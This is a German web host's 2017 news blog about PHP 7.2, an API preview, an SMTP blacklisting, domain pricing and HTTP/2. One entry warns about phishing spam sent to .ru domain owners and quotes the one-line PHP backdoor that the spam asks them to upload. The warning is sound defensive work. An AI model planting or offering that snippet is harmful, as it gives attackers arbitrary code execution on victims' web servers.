API für Funktionen des Kundenmenüs

6. Dezember 2017

Auszug aus der Dokumentation zur API

Vor einiger Zeit haben wir begonnen, die Funktionen unseres Kundenmenüs auch über eine API verfügbar zu machen. Diese API hat inzwischen einen Stand erreicht, mit dem Kunden bereits produktiv arbeiten können – wenn auch unter der Einschränkung, dass wir noch aktiv an der API arbeiten und jederzeit Änderungen möglich sind.

Die Funktionsvielfalt ist noch überschaubar; nichtsdestotrotz laden wir unsere Kunden herzlich ein, die API auszuprobieren und uns ein Feedback zu den vorhandenen und noch wünschenswerten Funktionen zu geben. Das Angebot richtet sich vor allem an Nutzer, die mit eigenen Scripten oder Tools auf Daten des Kundenmenüs zugreifen wollen.

Aktuell (Stand 06.12.2017) sind folgende Funktionen verfügbar:

  • Abruf von Domainlisten inklusive der verwendeten Nameserver und der Laufzeiten der Domains
  • Einrichtung von Subdomains, die auf den Webspace verweisen
  • Einrichtung von E-Mail-Weiterleitungen an einen oder mehrere Empfänger
Beispiel: Anlegen einer Subdomain über die API

Beispiel: Anlegen einer Subdomain über die API

Die Dokumentation zur API finden Sie hier: https://api-preview.variomedia.de/

Die Zugänge zur API basieren auf Benutzern des Kundenmenüs. Um einen Kundenmenübenutzer für die API freizuschalten, benötigen wir die E-Mail-Adresse des Nutzers. Bitte senden Sie dazu eine E-Mail an support@variomedia.de. Das Verfahren funktioniert auch für Endkunden von Resellern; wir können bei Bedarf auch für einzelne Endkunden einen API-Zugang freischalten. Mittelfristig wird die Freischaltung im Kundenmenü möglich sein.

PHP 7.2 verfügbar

1. Dezember 2017

Auf unseren Webservern steht ab sofort die neue PHP-Version 7.2 zur Verfügung.
PHP

Änderungen zur Vorgängerversion PHP 7.1

Grundsätzlich fallen die Änderungen an bestehenden Funktionen im Vergleich zur Vorgängerversion PHP 7.1 eher geringfügig aus, so dass die meisten aktuellen PHP-Anwendungen (z.B. WordPress, Joomla) auch unter PHP 7.2 lauffähig sind. Eine Übersicht über alle Änderungen finden Sie hier.

Neue Funktionen in PHP 7.2

Eine wichtige Neuerung in PHP 7.2 ist die Unterstützung der modernen Kryptographie-Bibliothek Libsodium, dafür wurde die veraltete Kryptographie-Extension Mcrypt entfernt. Die neue Sodium-Extension wird beispielsweise von WordPress bereits unterstützt. Außerdem kann die aktuelle Passwort-Hashing-Funktion Argon2 genutzt werden. Weiterhin unterstützt die ZIP-Extension nun auch AES-Verschlüsselung.

Verbesserungen in PHP 7.2

Wir konnten in unseren bisherigen Tests einen geringfügigen Geschwindigkeitsvorteil von bis zu 10% gegenüber der Vorgängerversion PHP 7.1 feststellen. Der Geschwindigkeitsvorteil  beim Wechsel von PHP 7.0 auf 7.2 beträgt etwa 20%, und beim Wechsel von PHP 5.6 sogar bis zu 300%.

PHP 7.2 aktivieren

Aktivierung von PHP 7.2 im KundenmenüSie können PHP 7.2 für Ihre Webseiten wie üblich über unser Kundenmenü oder per .htaccess-Datei mittels folgender Direktive aktivieren:

AddHandler application/x-httpd-php72 .php

Kunden, die PHP-FPM nutzen, können eine Umstellung auf PHP 7.2 formlos per E-Mail beauftragen.

Hinweise zu den unterstützten PHP-Versionen

Die PHP-Versionen 5.2, 5.3 und 5.5 sind seit längerer Zeit veraltet und sollten nicht mehr genutzt werden. Für die PHP-Versionen 5.6 und 7.0 werden von den Entwicklern noch bis Ende 2018 Updates für kritische Sicherheitsprobleme bereitgestellt, eine reguläre Weiterentwicklung dieser Versionen findet jedoch nicht mehr statt. Sie sollten daher nach Möglichkeit die aktuellen PHP-Versionen 7.1 oder 7.2 verwenden. Ein Wechsel von PHP 5.6 oder älter auf PHP 7.2 lohnt sich nicht zuletzt wegen der um bis zu 300% gestiegenen Ausführungsgeschwindigkeit.

SMTP-Server bei UCEProtect geblacklistet

10. November 2017

Die IP-Adressen unseres primären SMTP-Postausgangsservers smtp.variomedia.de (bzw. smtp.securehost.de) wurden am 8.11. aus für uns nicht nachvollziehbaren Gründen auf die berüchtigte UCEProtect-Blackliste gesetzt. Die betroffenen IP-Adressen werden erst am 15.11. aus dieser Blackliste entfernt, bis dahin kann es vereinzelt zu Problemen bei der Zustellung von E-Mails kommen.

Leider nutzen einige Mailserver-Betreiber noch immer gerne solche kostenlosen DNS-Blacklisten als Kriterium zur Klassifizierung unerwünschter E-Mails, obwohl dabei viele legitime E-Mails fälschlicherweise als Spam klassifiziert werden (False Positives). Der Hauptgrund dafür ist, dass leistungsfähigere inhaltsbasierte Spam-Filter aufwändiger zu konfigurieren sind, viel Rechenleistung benötigen oder – wie die von uns genutzte Spam-Filter-Software Expurgate – kostenpflichtig sind.

Bitte nutzen Sie im Falle von Problemen bei der E-Mail-Zustellung unseren alternativen Postausgangsserver smtp2.variomedia.de (bzw. smtp2.securehost.de) oder unser Webmail.

Update

Wir haben den betroffenen SMTP-Server nun bis zum Auslaufen des Blacklistings am 15.11. auf andere IP-Adressen umgestellt.

PHP 7.2 RC1 verfügbar

1. September 2017

Ab sofort steht auf unseren Webservern der erste Release Candidate der neuen PHP-Version 7.2 zu Testzwecken zur Verfügung. Bitte beachten Sie, dass es sich dabei um eine Vorabversion handelt, die noch einige Fehler enthalten kann, sie sollte daher nicht für den Produktiveinsatz genutzt werden. Die endgültige und für den Produktiveinsatz freigegebene Version von PHP 7.2 erscheint voraussichtlich gegen Ende November dieses Jahres.

Änderungen zur Vorgängerversion 7.1

Grundsätzlich fallen die Änderungen an bestehenden Funktionen im Vergleich zur Vorgängerversion PHP 7.1 geringfügig aus, so dass die meisten aktuellen PHP-Anwendungen auch unter PHP 7.2 lauffähig sind. Eine Übersicht über alle Änderungen finden Sie hier.

Wir konnten in ersten Tests einen kleinen Geschwindigkeitsvorteil von bis zu 10% zugunsten der neuen PHP-Version feststellen.

Eine wichtige Änderung ist die Entfernung der veralteten Verschlüsselungs-Extension Mcrypt, statt dessen sollte die neu hinzugefügte Extension Sodium genutzt werden.

PHP 7.2 aktivieren

Sie können PHP 7.2 wie üblich per .htaccess-Datei mittels folgender Direktive aktivieren:
AddHandler application/x-httpd-php72 .php
Die Aktivierung über das Kundenmenü wird erst möglich sein, sobald die finale Version von PHP 7.2 offiziell veröffentlicht wird.

Probleme bei der Installation von Joomla

16. August 2017

Aufgrund eines Programmierfehlers im Installer der aktuellen Joomla-Version 3.7.4 lässt sich diese nicht auf unseren Webservern installieren. Die Fortschrittsanzeige bei der Installation bleibt bei etwa 10% stehen, dann passiert nichts mehr.

Der Fehler ist den Joomla-Entwicklern bekannt und wird in der nächsten Joomla-Version behoben. Bitte nutzen Sie für eine Neuinstallation von Joomla bis dahin die Vorgängerversion 3.7.3 und nehmen dann ein Update auf die aktuelle Joomla-Version vor.

Update

Der Fehler wurde in der neuen Joomla Version 3.7.5 behoben.

Gefährlicher Spam an Inhaber von .ru-Domains

7. August 2017

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

Aktualisierung zur angekündigten Preiserhöhung am 8.9.2017

31. Juli 2017

Wie bereits im März angekündigt, erhöht die Registrierungstelle Uniregistry ab dem 8.9.2017 die Preise für einige ihrer Top-Level-Domains deutlich. Die Ankündigung der Erhöhung hat Uniregistry viel Kritik eingebracht. Kurz vor Inkrafttreten der Preiserhöhung gibt es nun zumindest eine kleine Abschwächung der Preiserhöhung. Die Änderung umfasst zwei Punkte:

  • Bei einigen TLDs bleiben die Preise für bereits registrierte Domains unverändert, sie werden nur für neue Domains erhöht. Dazu zählen folgende TLDs: .audio, .blackfriday, .diet, .flowers, .guitars, .hiphop, .property, .hosting, .juegos
  • Bei anderen TLDs werden die Preise für bestehende Domains – im Verhältnis zum hohen Neuregistrierungspreis – nur gering erhöht. Dies betrifft folgende TLDs: .click, .link, .help, .pics, .sexy, .tattoo, .christmas. Bei .click- und .link-Domains ist die Preiserhöhung so gering, dass wir auf eine Weitergabe des höheren Preises verzichten.

Nach wie vor gilt das Angebot, bestehende Domains noch vor der Preiserhöhung um bis zu 10 Jahre zu verlängern – in diesem Fall gilt der aktuelle Preis für die gesamte Laufzeit, wird allerdings auch sofort abgerechnet. Wir informieren alle Kunden, die von der Preiserhöhung betroffen sind, in den nächsten Tagen noch persönlich per E-Mail.

Die folgende Tabelle zeigt zusammenfassend alle betroffenen Top-Level-Domains, die Preise für Registrierungen / Verlängerungen vor dem 8.9. und die Preise für Registrierungen nach der Preiserhöhung.

 Preis bis 7.9.2017Preis ab 8.9.2017 für bestehende DomainsPreis ab 8.9.2017 für neue Domains
.help24,- Euro39,- Euro39,- Euro
.pics21,- Euro39,- Euro39,- Euro
.sexy21,- Euro39,- Euro39,- Euro
.christmas33,- Euro51,- Euro51,- Euro
.tattoo33,- Euro51,- Euro51,- Euro
.audio24,- Euro24,- Euro150,- Euro
.blackfriday33,- Euro33,- Euro150,- Euro
.diet24,- Euro24,- Euro150,- Euro
.flowers33,- Euro33,- Euro150,- Euro
.guitars33,- Euro33,- Euro150,- Euro
.hiphop21,- Euro21,- Euro150,- Euro
.property33,- Euro33,- Euro150,- Euro
.hosting33,- Euro33,- Euro450,- Euro
.juegos24,- Euro24,- Euro450,- Euro
Alle Preise in Euro pro Jahr inkl. 19% Mehrwertsteuer.

Aktion bis zum 31.7.2017: Bis zu 90% Rabatt auf ausgewählte TLDs

21. Juli 2017

Noch bis zum 31. Juli bieten wir ingesamt 18 Top-Level-Domains mit Rabatten bis zu 90% im ersten Jahr (Neuregistrierung) an:

TLDNormalpreis (pro Jahr)Aktionspreis im ersten Jahr
.email18,- Euro6,- Euro
.city21,- Euro6,- Euro
.business21,- Euro6,- Euro
.fail24,- Euro6,- Euro
.gold99,- Euro6,- Euro
.credit99,- Euro6,- Euro
.jetzt21,- Euro12,- Euro
.schule21,- Euro12,- Euro
.events27,- Euro12,- Euro
.reisen33,- Euro12,- Euro
.gmbh33,- Euro12,- Euro
.immo39,- Euro12,- Euro
.shopping39,- Euro12,- Euro
.marketing42,- Euro12,- Euro
.guru42,- Euro12,- Euro
.media42,- Euro12,- Euro
.restaurant57,- Euro12,- Euro
.reise111,- Euro12,- Euro

Alle Preise enthalten 19% Mehrwertsteuer. Der Aktionspreis gilt für Neuregistrierungen bis zum 31.7.2017 (Mitternacht). Ausgenommen sind Domains, die die jeweilige Registrierungsstelle als Premiumdomains deklariert hat; diese werden zum jeweiligen Premiumpreis abgerechnet.

Die Vertragslaufzeit bei allen Domains beträgt 1 Jahr mit einer Kündigungsfrist von vier Wochen zum Ende der Vertragslaufzeit.

Neukunden können die gewünschten Domains über unsere Webseite bestellen. Bestandskunden können die gewünschten Domains im Kundenmenü auf Verfügbarkeit prüfen und zur Registrierung beauftragen.

.asia-Domains jetzt ohne Treuhandservice

21. Juli 2017

Ab sofort ist die Registrierung von .asia-Domains auch ohne einen Wohn- oder Firmensitz in Asien möglich. Die Registrierungsstelle hat die Vergabebedingungen für .asia-Domains entsprechend geändert.

Um unseren Kunden in Europa die Registrierung von .asia-Domains zu ermöglichen, haben wir bisher mit einem Anwalt in Japan zusammengearbeitet. Er agierte treuhänderisch als Admin-C für alle bei uns registrierten .asia-Domains. Nach der Freigabe durch die Registrierungsstelle ist dies nun nicht mehr erforderlich. Alle bestehenden .asia-Domains werden in Kürze automatisch durch uns aktualisiert.

Wir bieten .asia-Domains für 24,- Euro pro Jahr an. Reseller erhalten (je nach Gesamtbestand ihrer Domains) einen Rabatt bis zu 15% auf den Jahrespreis. Der Treuhandservice wurde von uns bisher kostenlos zur Verfügung gestellt.

HTTP/2 auf unseren Webservern verfügbar

6. Juli 2017

Unsere Webserver unterstützen ab sofort HTTP/2. Dabei handelt es sich um eine verbesserte Version des HTTP-Protokolls, mit dem Webseiten von unseren Webservern zu Ihrem Browser übertragen werden. HTTP/2 basiert auf dem von Google entwickelten SPDY-Protokoll, dessen Weiterentwicklung zugunsten von HTTP/2 eingestellt wurde.

Vorteile von HTTP/2

Die wichtigste Neuerung in HTTP/2 ist, dass nun mehrere Elemente einer Webseite gleichzeitig über eine einzige Verbindung übertragen werden können (Multiplex). Zuvor war für jedes einzelne Element einer Webseite eine eigene Verbindung erforderlich, deren Aufbau durch Netzwerklatenzen immer einige Zeit in Anspruch nimmt. Bei Webseiten mit sehr vielen Elementen kann HTTP/2 daher zu einer Verbesserung der Ladezeit führen. Auch bei Mobilfunkverbindungen (z.B. EDGE, UMTS, LTE) kann HTTP/2 die Ladezeit reduzieren, da die Netzwerklatenzen hier besonders hoch ausfallen.

Voraussetzungen für HTTP/2

HTTP/2 wird von praktisch allen aktuellen Web-Browsern unterstützt, es sind keine Anpassungen an Ihren Webseiten erforderlich. Browser ohne HTTP/2-Unterstützung nutzen automatisch die vorigen Protokollversionen HTTP/1.1 bzw. HTTP/1.0, die von unseren Webservern auch weiterhin unterstützt werden.

HTTP/2 kann jedoch nur bei verschlüsselten HTTPS-Verbindungen genutzt werden, für die ein gültiges SSL-Zertifikat benötigt wird. Ein solches SSL-Zertifikat ist in vielen unserer Hosting-Pakete bereits inklusive, zur Einrichtung von SSL-Zertifikaten für Ihre Webseiten wenden Sie sich bitte an unsere Kundenbetreuung.

Browser mit HTTP/2-Unterstützung

  • Apple Safari ab Version 9
  • Google Chrome ab Version 40
  • Microsoft Edge
  • Microsoft Internet Explorer ab Version 11
  • Mozilla Firefox ab Version 36

Update: Probleme mit Node.js

Durch die Aktivierung von HTTP/2 wurden von der Webserver-Software Apache automatisch HTTP-Upgrade-Header generiert, die zu Problemen mit älteren Node.js-Versionen geführt haben. Diese Header wurden nur bei verschlüsselten HTTPS-Verbindungen mit der alten Protokollversion HTTP/1.1 gesendet, und sollen die Unterstützung für HTTP/2 durch den Webserver bekanntgeben. Die Upgrade-Header sind jedoch nicht erforderlich, da wir HTTP/2 nur für verschlüsselte HTTPS-Verbindungen nutzen, und die Unterstützung für HTTP/2 in diesem Fall bereits bei der Aushandlung der Verschlüsselung mitgeteilt wird (ALPN).  Wir haben diese problematischen HTTP-Header daher nun entfernt.